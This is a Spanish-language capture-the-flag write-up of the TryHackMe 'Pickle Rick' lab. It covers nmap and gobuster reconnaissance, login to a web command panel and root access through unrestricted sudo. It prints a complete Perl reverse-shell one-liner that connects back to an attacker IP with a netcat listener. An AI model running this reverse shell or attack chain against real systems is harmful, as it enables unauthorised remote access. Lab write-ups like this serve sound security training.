Pickle Rick
✍️ Autor: tryhackme, ar33zy, arebel 🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 10.10.146.162para verificar la conectividad de red.
A continuación, se realiza el comando:
nmap 10.10.146.1626para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Como podemos observar durante el escaneo el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos, por lo que se procederá a indagar más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 10.10.146.162para obtener más información sobre esos puertos específicamente.
Revisamos el puerto 80.
Revisando el código fuente hay algo relevante como un usuario.
Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.146.162
Encontramos una página de login y un robots.txt interesantes.
Nos logueamos con el usuario y contraseña descubierta anteriormente.
Es un panel de comandos por lo que listamos y vemos el contenido.
🚀 EXPLOTACIÓN
Como podemos ejecutar comandos para obtener una Reverse Shell.
nc -nlvp 4444
perl -e 'use Socket;$i="10.8.146.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoamiaún no somos root, por lo que hacemos:
sudo -lpara ver si hay algo para explotar.
Comprobamos que tienen todos los permisos por lo que podemos ejecutar como root cualquier comando.
sudo ls /root/
sudo cat /root/3rd.txtLast updated
Was this helpful?